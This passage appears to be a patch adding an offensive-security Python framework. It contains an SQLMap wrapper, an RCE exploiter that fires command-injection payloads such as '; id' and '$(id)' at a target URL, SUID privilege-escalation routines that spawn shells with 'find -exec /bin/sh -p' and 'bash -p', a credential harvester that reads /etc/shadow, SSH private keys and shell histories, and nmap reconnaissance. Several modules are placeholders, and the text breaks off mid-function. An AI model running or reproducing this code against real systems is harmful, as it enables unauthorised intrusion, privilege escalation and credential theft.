'--dbs'
|
||||||
|
]
|
||||||
|
|
||||||
|
proc = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=300
|
||||||
|
)
|
||||||
|
|
||||||
|
if 'available databases' in proc.stdout.lower():
|
||||||
|
result["success"] = True
|
||||||
|
result["databases"] = self._extract_databases(proc.stdout)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"SQL injection error: {e}")
|
||||||
|
result["error"] = str(e)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def _extract_databases(self, output: str) -> List[str]:
|
||||||
|
"""Extract database names from SQLMap output"""
|
||||||
|
databases = []
|
||||||
|
|
||||||
|
for line in output.split('\n'):
|
||||||
|
if '[*]' in line and len(line.strip()) > 4:
|
||||||
|
db_name = line.split('[*]')[1].strip()
|
||||||
|
if db_name and not db_name.startswith('available'):
|
||||||
|
databases.append(db_name)
|
||||||
|
|
||||||
|
return databases
|
||||||
|
|
||||||
|
|
||||||
|
class RCEExploiter:
|
||||||
|
"""Remote Code Execution exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit RCE vulnerability"""
|
||||||
|
logger.info(f"Attempting RCE on {target}")
|
||||||
|
|
||||||
|
# Test various RCE payloads
|
||||||
|
payloads = [
|
||||||
|
'; id',
|
||||||
|
'| id',
|
||||||
|
'`id`',
|
||||||
|
'$(id)',
|
||||||
|
'; whoami',
|
||||||
|
'| whoami'
|
||||||
|
]
|
||||||
|
|
||||||
|
for payload in payloads:
|
||||||
|
try:
|
||||||
|
response = requests.get(
|
||||||
|
f"{target}?cmd={payload}",
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
# Check for command execution indicators
|
||||||
|
if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"vulnerability": "RCE",
|
||||||
|
"payload": payload,
|
||||||
|
"output": response.text[:500]
|
||||||
|
}
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return {"success": False}
|
||||||
|
|
||||||
|
|
||||||
|
class BufferOverflowExploiter:
|
||||||
|
"""Buffer overflow exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit buffer overflow"""
|
||||||
|
logger.info(f"Attempting buffer overflow on {target}")
|
||||||
|
|
||||||
|
# This is a complex topic - placeholder for demonstration
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "Buffer overflow exploitation requires specific target analysis"
|
||||||
|
}
|
||||||
0
tools/lateral_movement/__init__.py
Normal file
0
tools/lateral_movement/__init__.py
Normal file
0
tools/persistence/__init__.py
Normal file
0
tools/persistence/__init__.py
Normal file
8
tools/privesc/__init__.py
Normal file
8
tools/privesc/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
from .privesc_tools import (
|
||||||
|
LinuxPrivEsc,
|
||||||
|
WindowsPrivEsc,
|
||||||
|
KernelExploiter,
|
||||||
|
MisconfigFinder,
|
||||||
|
CredentialHarvester,
|
||||||
|
SudoExploiter
|
||||||
|
)
|
||||||
480
tools/privesc/privesc_tools.py
Normal file
480
tools/privesc/privesc_tools.py
Normal file
@@ -0,0 +1,480 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
|
||||||
|
"""
|
||||||
|
|
||||||
|
import subprocess
|
||||||
|
import json
|
||||||
|
import re
|
||||||
|
from typing import Dict, List
|
||||||
|
import logging
|
||||||
|
import base64
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class LinuxPrivEsc:
|
||||||
|
"""Linux privilege escalation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def enumerate(self) -> Dict:
|
||||||
|
"""Enumerate Linux system for privilege escalation vectors"""
|
||||||
|
logger.info("Enumerating Linux system")
|
||||||
|
|
||||||
|
info = {
|
||||||
|
"os": "linux",
|
||||||
|
"kernel_version": self._get_kernel_version(),
|
||||||
|
"suid_binaries": self._find_suid_binaries(),
|
||||||
|
"sudo_permissions": self._check_sudo(),
|
||||||
|
"writable_paths": self._find_writable_paths(),
|
||||||
|
"cron_jobs": self._check_cron_jobs(),
|
||||||
|
"capabilities": self._check_capabilities()
|
||||||
|
}
|
||||||
|
|
||||||
|
return info
|
||||||
|
|
||||||
|
def _get_kernel_version(self) -> str:
|
||||||
|
"""Get kernel version"""
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['uname', '-r'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=5
|
||||||
|
)
|
||||||
|
return result.stdout.strip()
|
||||||
|
except:
|
||||||
|
return "unknown"
|
||||||
|
|
||||||
|
def _find_suid_binaries(self) -> List[str]:
|
||||||
|
"""Find SUID binaries"""
|
||||||
|
logger.info("Searching for SUID binaries")
|
||||||
|
|
||||||
|
suid_bins = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
cmd = 'find / -perm -4000 -type f 2>/dev/null'
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
shell=True,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=60
|
||||||
|
)
|
||||||
|
|
||||||
|
suid_bins = result.stdout.strip().split('\n')
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"SUID search error: {e}")
|
||||||
|
|
||||||
|
return suid_bins
|
||||||
|
|
||||||
|
def _check_sudo(self) -> List[str]:
|
||||||
|
"""Check sudo permissions"""
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['sudo', '-l'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=5
|
||||||
|
)
|
||||||
|
|
||||||
|
return result.stdout.strip().split('\n')
|
||||||
|
except:
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _find_writable_paths(self) -> List[str]:
|
||||||
|
"""Find writable paths in $PATH"""
|
||||||
|
writable = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
paths = subprocess.run(
|
||||||
|
['echo', '$PATH'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
shell=True
|
||||||
|
).stdout.strip().split(':')
|
||||||
|
|
||||||
|
for path in paths:
|
||||||
|
if subprocess.run(['test', '-w', path]).returncode == 0:
|
||||||
|
writable.append(path)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return writable
|
||||||
|
|
||||||
|
def _check_cron_jobs(self) -> List[str]:
|
||||||
|
"""Check cron jobs"""
|
||||||
|
cron_files = [
|
||||||
|
'/etc/crontab',
|
||||||
|
'/etc/cron.d/*',
|
||||||
|
'/var/spool/cron/crontabs/*'
|
||||||
|
]
|
||||||
|
|
||||||
|
jobs = []
|
||||||
|
|
||||||
|
for cron_file in cron_files:
|
||||||
|
try:
|
||||||
|
with open(cron_file, 'r') as f:
|
||||||
|
jobs.extend(f.readlines())
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return jobs
|
||||||
|
|
||||||
|
def _check_capabilities(self) -> List[str]:
|
||||||
|
"""Check file capabilities"""
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['getcap', '-r', '/', '2>/dev/null'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=60,
|
||||||
|
shell=True
|
||||||
|
)
|
||||||
|
|
||||||
|
return result.stdout.strip().split('\n')
|
||||||
|
except:
|
||||||
|
return []
|
||||||
|
|
||||||
|
def exploit_suid(self, binary: str) -> Dict:
|
||||||
|
"""Exploit SUID binary"""
|
||||||
|
logger.info(f"Attempting SUID exploit: {binary}")
|
||||||
|
|
||||||
|
result = {
|
||||||
|
"success": False,
|
||||||
|
"technique": "suid_exploitation",
|
||||||
|
"binary": binary
|
||||||
|
}
|
||||||
|
|
||||||
|
# Known SUID exploits
|
||||||
|
exploits = {
|
||||||
|
'/usr/bin/cp': self._exploit_cp,
|
||||||
|
'/usr/bin/mv': self._exploit_mv,
|
||||||
|
'/usr/bin/find': self._exploit_find,
|
||||||
|
'/usr/bin/vim': self._exploit_vim,
|
||||||
|
'/usr/bin/nano': self._exploit_nano,
|
||||||
|
'/bin/bash': self._exploit_bash
|
||||||
|
}
|
||||||
|
|
||||||
|
if binary in exploits:
|
||||||
|
try:
|
||||||
|
result = exploits[binary]()
|
||||||
|
except Exception as e:
|
||||||
|
result["error"] = str(e)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def _exploit_find(self) -> Dict:
|
||||||
|
"""Exploit find SUID"""
|
||||||
|
try:
|
||||||
|
cmd = 'find . -exec /bin/sh -p \\; -quit'
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
shell=True,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"technique": "find_suid",
|
||||||
|
"shell_obtained": True
|
||||||
|
}
|
||||||
|
except:
|
||||||
|
return {"success": False}
|
||||||
|
|
||||||
|
def _exploit_vim(self) -> Dict:
|
||||||
|
"""Exploit vim SUID"""
|
||||||
|
return {"success": False, "message": "Vim SUID exploitation placeholder"}
|
||||||
|
|
||||||
|
def _exploit_nano(self) -> Dict:
|
||||||
|
"""Exploit nano SUID"""
|
||||||
|
return {"success": False, "message": "Nano SUID exploitation placeholder"}
|
||||||
|
|
||||||
|
def _exploit_cp(self) -> Dict:
|
||||||
|
"""Exploit cp SUID"""
|
||||||
|
return {"success": False, "message": "CP SUID exploitation placeholder"}
|
||||||
|
|
||||||
|
def _exploit_mv(self) -> Dict:
|
||||||
|
"""Exploit mv SUID"""
|
||||||
|
return {"success": False, "message": "MV SUID exploitation placeholder"}
|
||||||
|
|
||||||
|
def _exploit_bash(self) -> Dict:
|
||||||
|
"""Exploit bash SUID"""
|
||||||
|
try:
|
||||||
|
cmd = 'bash -p'
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
shell=True,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"technique": "bash_suid",
|
||||||
|
"shell_obtained": True
|
||||||
|
}
|
||||||
|
except:
|
||||||
|
return {"success": False}
|
||||||
|
|
||||||
|
def exploit_path_hijacking(self, writable_path: str) -> Dict:
|
||||||
|
"""Exploit PATH hijacking"""
|
||||||
|
logger.info(f"Attempting PATH hijacking: {writable_path}")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "PATH hijacking exploitation placeholder"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
class WindowsPrivEsc:
|
||||||
|
"""Windows privilege escalation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def enumerate(self) -> Dict:
|
||||||
|
"""Enumerate Windows system"""
|
||||||
|
logger.info("Enumerating Windows system")
|
||||||
|
|
||||||
|
info = {
|
||||||
|
"os": "windows",
|
||||||
|
"version": self._get_windows_version(),
|
||||||
|
"services": self._enumerate_services(),
|
||||||
|
"always_install_elevated": self._check_always_install_elevated(),
|
||||||
|
"unquoted_service_paths": self._find_unquoted_paths(),
|
||||||
|
"privileges": self._check_privileges()
|
||||||
|
}
|
||||||
|
|
||||||
|
return info
|
||||||
|
|
||||||
|
def _get_windows_version(self) -> str:
|
||||||
|
"""Get Windows version"""
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['ver'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
shell=True,
|
||||||
|
timeout=5
|
||||||
|
)
|
||||||
|
return result.stdout.strip()
|
||||||
|
except:
|
||||||
|
return "unknown"
|
||||||
|
|
||||||
|
def _enumerate_services(self) -> List[Dict]:
|
||||||
|
"""Enumerate Windows services"""
|
||||||
|
services = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['sc', 'query'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=30
|
||||||
|
)
|
||||||
|
|
||||||
|
# Parse service output
|
||||||
|
for line in result.stdout.split('\n'):
|
||||||
|
if 'SERVICE_NAME:' in line:
|
||||||
|
services.append({"name": line.split(':')[1].strip()})
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return services
|
||||||
|
|
||||||
|
def _check_always_install_elevated(self) -> bool:
|
||||||
|
"""Check AlwaysInstallElevated registry key"""
|
||||||
|
try:
|
||||||
|
# Check both HKLM and HKCU
|
||||||
|
keys = [
|
||||||
|
r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
|
||||||
|
r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
|
||||||
|
]
|
||||||
|
|
||||||
|
for key in keys:
|
||||||
|
result = subprocess.run(
|
||||||
|
['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True
|
||||||
|
)
|
||||||
|
|
||||||
|
if '0x1' in result.stdout:
|
||||||
|
return True
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
def _find_unquoted_paths(self) -> List[str]:
|
||||||
|
"""Find unquoted service paths"""
|
||||||
|
unquoted = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=30
|
||||||
|
)
|
||||||
|
|
||||||
|
for line in result.stdout.split('\n'):
|
||||||
|
if 'C:\\' in line and line.count('"') < 2:
|
||||||
|
unquoted.append(line)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return unquoted
|
||||||
|
|
||||||
|
def _check_privileges(self) -> List[str]:
|
||||||
|
"""Check current user privileges"""
|
||||||
|
try:
|
||||||
|
result = subprocess.run(
|
||||||
|
['whoami', '/priv'],
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
return result.stdout.strip().split('\n')
|
||||||
|
except:
|
||||||
|
return []
|
||||||
|
|
||||||
|
def exploit_service(self, service: Dict) -> Dict:
|
||||||
|
"""Exploit service misconfiguration"""
|
||||||
|
logger.info(f"Attempting service exploitation: {service.get('name')}")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "Windows service exploitation placeholder"
|
||||||
|
}
|
||||||
|
|
||||||
|
def exploit_msi(self) -> Dict:
|
||||||
|
"""Exploit AlwaysInstallElevated"""
|
||||||
|
logger.info("Attempting AlwaysInstallElevated exploitation")
|
||||||
|
|
||||||
|
# Generate malicious MSI
|
||||||
|
# This would create and install a privileged MSI package
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "AlwaysInstallElevated exploitation placeholder"
|
||||||
|
}
|
||||||
|
|
||||||
|
def impersonate_token(self) -> Dict:
|
||||||
|
"""Token impersonation attack"""
|
||||||
|
logger.info("Attempting token impersonation")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "Token impersonation placeholder"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
class KernelExploiter:
|
||||||
|
"""Kernel exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def exploit_linux(self, kernel_version: str) -> Dict:
|
||||||
|
"""Exploit Linux kernel"""
|
||||||
|
logger.info(f"Attempting kernel exploit: {kernel_version}")
|
||||||
|
|
||||||
|
# Map kernel versions to known exploits
|
||||||
|
exploits = {
|
||||||
|
'DirtyCow': ['2.6.22', '4.8.3'],
|
||||||
|
'OverlayFS': ['3.13.0', '4.3.3']
|
||||||
|
}
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "Kernel exploitation requires specific exploit compilation"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
class MisconfigFinder:
|
||||||
|
"""Find misconfigurations"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def find(self, os_type: str) -> List[Dict]:
|
||||||
|
"""Find security misconfigurations"""
|
||||||
|
if os_type == "linux":
|
||||||
|
return self._find_linux_misconfigs()
|
||||||
|
elif os_type == "windows":
|
||||||
|
return self._find_windows_misconfigs()
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _find_linux_misconfigs(self) -> List[Dict]:
|
||||||
|
"""Find Linux misconfigurations"""
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _find_windows_misconfigs(self) -> List[Dict]:
|
||||||
|
"""Find Windows misconfigurations"""
|
||||||
|
return []
|
||||||
|
|
||||||
|
|
||||||
|
class CredentialHarvester:
|
||||||
|
"""Harvest credentials"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def harvest_linux(self) -> List[Dict]:
|
||||||
|
"""Harvest Linux credentials"""
|
||||||
|
logger.info("Harvesting Linux credentials")
|
||||||
|
|
||||||
|
credentials = []
|
||||||
|
|
||||||
|
# Check common credential locations
|
||||||
|
locations = [
|
||||||
|
'/etc/shadow',
|
||||||
|
'/etc/passwd',
|
||||||
|
'~/.ssh/id_rsa',
|
||||||
|
'~/.bash_history',
|
||||||
|
'~/.mysql_history'
|
||||||
|
]
|
||||||
|
|
||||||
|
for location in locations:
|
||||||
|
try:
|
||||||
|
with open(location, 'r') as f:
|
||||||
|
credentials.append({
|
||||||
|
"source": location,
|
||||||
|
"data": f.read()[:500]
|
||||||
|
})
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return credentials
|
||||||
|
|
||||||
|
def harvest_windows(self) -> List[Dict]:
|
||||||
|
"""Harvest Windows credentials"""
|
||||||
|
logger.info("Harvesting Windows credentials")
|
||||||
|
|
||||||
|
# Use mimikatz or similar tools
|
||||||
|
# Placeholder for demonstration
|
||||||
|
|
||||||
|
return []
|
||||||
|
|
||||||
|
|
||||||
|
class SudoExploiter:
|
||||||
|
"""Sudo exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def exploit(self, sudo_permission: str) -> Dict:
|
||||||
|
"""Exploit sudo permission"""
|
||||||
|
logger.info(f"Attempting sudo exploit: {sudo_permission}")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"success": False,
|
||||||
|
"message": "Sudo exploitation placeholder"
|
||||||
|
}
|
||||||
4
tools/recon/__init__.py
Normal file
4
tools/recon/__init__.py
Normal file
@@ -0,0 +1,4 @@
|
|||||||
|
from .network_scanner import NetworkScanner
|
||||||
|
from .osint_collector import OSINTCollector
|
||||||
|
from .dns_enumerator import DNSEnumerator
|
||||||
|
from .subdomain_finder import SubdomainFinder
|
||||||
48
tools/recon/dns_enumerator.py
Normal file
48
tools/recon/dns_enumerator.py
Normal file
@@ -0,0 +1,48 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
DNSEnumerator - A placeholder for a DNS enumeration tool.
|
||||||
|
"""
|
||||||
|
import logging
|
||||||
|
from typing import Dict
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class DNSEnumerator:
|
||||||
|
"""
|
||||||
|
A class for enumerating DNS records.
|
||||||
|
This is a placeholder and should be expanded.
|
||||||
|
"""
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""
|
||||||
|
Initializes the DNSEnumerator.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
config (Dict): The configuration dictionary for the framework.
|
||||||
|
"""
|
||||||
|
self.config = config
|
||||||
|
logger.info("DNSEnumerator initialized (placeholder)")
|
||||||
|
|
||||||
|
def enumerate(self, target: str) -> Dict:
|
||||||
|
"""
|
||||||
|
Enumerates DNS records for a given domain.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target (str): The domain name to enumerate.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dict: A dictionary containing DNS records.
|
||||||
|
"""
|
||||||
|
logger.warning(f"DNS enumeration for {target} is a placeholder. Returning empty data.")
|
||||||
|
# Placeholder: In a real implementation, this would use libraries
|
||||||
|
# like dnspython to query for A, AAAA, MX, NS, TXT, etc. records.
|
||||||
|
return {
|
||||||
|
"target": target,
|
||||||
|
"records": {
|
||||||
|
"A": [],
|
||||||
|
"AAAA": [],
|
||||||
|
"MX": [],
|
||||||
|
"NS": [],
|
||||||
|
"TXT": []
|
||||||
|
},
|
||||||
|
"notes": "No DNS enumeration implemented yet."
|
||||||
|
}
|
||||||
64
tools/recon/network_scanner.py
Normal file
64
tools/recon/network_scanner.py
Normal file
@@ -0,0 +1,64 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
NetworkScanner - A tool for scanning networks to find open ports.
|
||||||
|
"""
|
||||||
|
import socket
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class NetworkScanner:
|
||||||
|
"""
|
||||||
|
A class to scan for open ports on a target machine.
|
||||||
|
"""
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""
|
||||||
|
Initializes the NetworkScanner.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
config (Dict): The configuration dictionary for the framework.
|
||||||
|
"""
|
||||||
|
self.config = config
|
||||||
|
self.common_ports = [
|
||||||
|
21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
|
||||||
|
993, 995, 1723, 3306, 3389, 5900, 8080
|
||||||
|
]
|
||||||
|
|
||||||
|
def scan(self, target: str) -> Dict:
|
||||||
|
"""
|
||||||
|
Scans a target for open ports.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target (str): The IP address or hostname to scan.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dict: A dictionary containing the list of open ports found.
|
||||||
|
"""
|
||||||
|
logger.info(f"Starting network scan on {target}")
|
||||||
|
open_ports = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
target_ip = socket.gethostbyname(target)
|
||||||
|
logger.info(f"Resolved {target} to {target_ip}")
|
||||||
|
|
||||||
|
for port in self.common_ports:
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
socket.setdefaulttimeout(1)
|
||||||
|
|
||||||
|
result = sock.connect_ex((target_ip, port))
|
||||||
|
if result == 0:
|
||||||
|
logger.info(f"Port {port} is open on {target}")
|
||||||
|
open_ports.append(port)
|
||||||
|
sock.close()
|
||||||
|
|
||||||
|
except socket.gaierror:
|
||||||
|
logger.error(f"Hostname could not be resolved: {target}")
|
||||||
|
return {"error": "Hostname could not be resolved."}
|
||||||
|
except socket.error:
|
||||||
|
logger.error(f"Could not connect to server: {target}")
|
||||||
|
return {"error": "Could not connect to server."}
|
||||||
|
|
||||||
|
logger.info(f"Network scan finished. Found {len(open_ports)} open ports.")
|
||||||
|
return {"target": target, "open_ports": open_ports}
|
||||||
|
|
||||||
43
tools/recon/osint_collector.py
Normal file
43
tools/recon/osint_collector.py
Normal file
@@ -0,0 +1,43 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
OSINTCollector - A placeholder for an OSINT gathering tool.
|
||||||
|
"""
|
||||||
|
import logging
|
||||||
|
from typing import Dict
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class OSINTCollector:
|
||||||
|
"""
|
||||||
|
A class for collecting Open Source Intelligence.
|
||||||
|
This is a placeholder and should be expanded with actual OSINT tools.
|
||||||
|
"""
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""
|
||||||
|
Initializes the OSINTCollector.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
config (Dict): The configuration dictionary for the framework.
|
||||||
|
"""
|
||||||
|
self.config = config
|
||||||
|
logger.info("OSINTCollector initialized (placeholder)")
|
||||||
|
|
||||||
|
def collect(self, target: str) -> Dict:
|
||||||
|
"""
|
||||||
|
Collects OSINT data for a given target.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target (str): The target (e.g., domain name, company name).
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dict: A dictionary containing OSINT findings.
|
||||||
|
"""
|
||||||
|
logger.warning(f"OSINT collection for {target} is a placeholder. Returning empty data.")
|
||||||
|
# Placeholder: In a real implementation, this would query APIs like
|
||||||
|
# Google, Shodan, Have I Been Pwned, etc.
|
||||||
|
return {
|
||||||
|
"target": target,
|
||||||
|
"emails": [],
|
||||||
|
"leaked_credentials": [],
|
||||||
|
"metadata": "No OSINT collection implemented yet."
|
||||||
|
}
|
||||||
417
tools/recon/recon_tools.py
Normal file
417
tools/recon/recon_tools.py
Normal file
@@ -0,0 +1,417 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Reconnaissance Tools - Network scanning, web recon, OSINT, DNS enumeration
|
||||||
|
"""
|
||||||
|
|
||||||
|
import subprocess
|
||||||
|
import json
|
||||||
|
import re
|
||||||
|
import socket
|
||||||
|
import requests
|
||||||
|
from typing import Dict, List
|
||||||
|
import logging
|
||||||
|
from urllib.parse import urlparse
|
||||||
|
import dns.resolver
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class NetworkScanner:
|
||||||
|
"""Network scanning and port enumeration"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
self.nmap_path = config.get('tools', {}).get('nmap', '/usr/bin/nmap')
|
||||||
|
|
||||||
|
def scan(self, target: str) -> Dict:
|
||||||
|
"""Perform comprehensive network scan"""
|
||||||
|
logger.info(f"Scanning target: {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"hosts": {},
|
||||||
|
"summary": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Quick scan for open ports
|
||||||
|
quick_scan = self._nmap_scan(target, "-sS -T4 -p-")
|
||||||
|
results["hosts"].update(quick_scan)
|
||||||
|
|
||||||
|
# Service version detection
|
||||||
|
if results["hosts"]:
|
||||||
|
version_scan = self._nmap_scan(target, "-sV -sC")
|
||||||
|
results["hosts"].update(version_scan)
|
||||||
|
|
||||||
|
# Vulnerability scan
|
||||||
|
vuln_scan = self._nmap_vuln_scan(target)
|
||||||
|
results["vulnerabilities"] = vuln_scan
|
||||||
|
|
||||||
|
results["summary"] = self._generate_summary(results["hosts"])
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Network scan error: {e}")
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _nmap_scan(self, target: str, options: str) -> Dict:
|
||||||
|
"""Execute nmap scan"""
|
||||||
|
try:
|
||||||
|
cmd = f"{self.nmap_path} {options} {target} -oX -"
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd.split(),
|
||||||
|
capture_output=True,
|
||||||
|
timeout=300,
|
||||||
|
text=True
|
||||||
|
)
|
||||||
|
|
||||||
|
return self._parse_nmap_output(result.stdout)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Nmap scan error: {e}")
|
||||||
|
return {}
|
||||||
|
|
||||||
|
def _nmap_vuln_scan(self, target: str) -> List[Dict]:
|
||||||
|
"""Scan for vulnerabilities using NSE scripts"""
|
||||||
|
try:
|
||||||
|
cmd = f"{self.nmap_path} --script vuln {target}"
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd.split(),
|
||||||
|
capture_output=True,
|
||||||
|
timeout=600,
|
||||||
|
text=True
|
||||||
|
)
|
||||||
|
|
||||||
|
return self._parse_vuln_output(result.stdout)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Vulnerability scan error: {e}")
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _parse_nmap_output(self, output: str) -> Dict:
|
||||||
|
"""Parse nmap XML output"""
|
||||||
|
hosts = {}
|
||||||
|
|
||||||
|
# Simple parsing - in production, use proper XML parser
|
||||||
|
ip_pattern = r'(\d+\.\d+\.\d+\.\d+)'
|
||||||
|
port_pattern = r'(\d+)/tcp\s+open\s+(\S+)'
|
||||||
|
|
||||||
|
current_ip = None
|
||||||
|
for line in output.split('\n'):
|
||||||
|
ip_match = re.search(ip_pattern, line)
|
||||||
|
if ip_match and 'Nmap scan report' in line:
|
||||||
|
current_ip = ip_match.group(1)
|
||||||
|
hosts[current_ip] = {
|
||||||
|
"ip": current_ip,
|
||||||
|
"open_ports": [],
|
||||||
|
"os": "unknown"
|
||||||
|
}
|
||||||
|
|
||||||
|
port_match = re.search(port_pattern, line)
|
||||||
|
if port_match and current_ip:
|
